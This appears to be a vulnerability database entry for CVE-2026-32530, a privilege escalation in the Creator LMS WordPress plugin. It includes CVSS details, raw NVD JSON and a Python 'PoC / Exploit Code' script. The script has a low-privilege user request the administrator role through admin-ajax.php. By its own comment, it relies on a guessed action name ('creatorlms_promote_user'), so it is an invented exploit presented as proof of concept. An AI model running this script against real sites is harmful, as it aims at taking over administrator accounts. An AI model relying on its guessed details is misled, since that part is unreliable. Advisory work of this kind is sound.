Security Vulnerability Report
中文
CVE-2026-32530 CVSS 8.8 HIGH

CVE-2026-32530

Published: 2026-03-25 17:17:06
Last Modified: 2026-04-24 16:35:20

Description

Incorrect Privilege Assignment vulnerability in WPFunnels Creator LMS creatorlms allows Privilege Escalation.This issue affects Creator LMS: from n/a through <= 1.1.18.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Creator LMS <= 1.1.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (example) target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Attacker's session cookie (low privilege user) attacker_cookie = { "wordpress_logged_in_hash": "..." } # Exploit payload targeting the vulnerable action # Assuming 'creatorlms_promote_user' is the vulnerable action based on common patterns payload = { "action": "creatorlms_promote_user", "user_id": "2", # The ID of the user to escalate (attacker's ID) "role": "administrator" } try: response = requests.post(target_url, data=payload, cookies=attacker_cookie) if response.status_code == 200: print("[+] Request sent successfully. Check if privileges were escalated.") else: print("[-] Failed to send request.") except Exception as e: print(f"[Error] {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32530", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:06.377", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in WPFunnels Creator LMS creatorlms allows Privilege Escalation.This issue affects Creator LMS: from n/a through <= 1.1.18."}, {"lang": "es", "value": "Vulnerabilidad de Asignación Incorrecta de Privilegios en WPFunnels Creator LMS creatorlms permite la escalada de privilegios. Este problema afecta a Creator LMS: desde n/a hasta &lt;= 1.1.18."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/creatorlms/vulnerability/wordpress-creator-lms-plugin-1-1-18-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}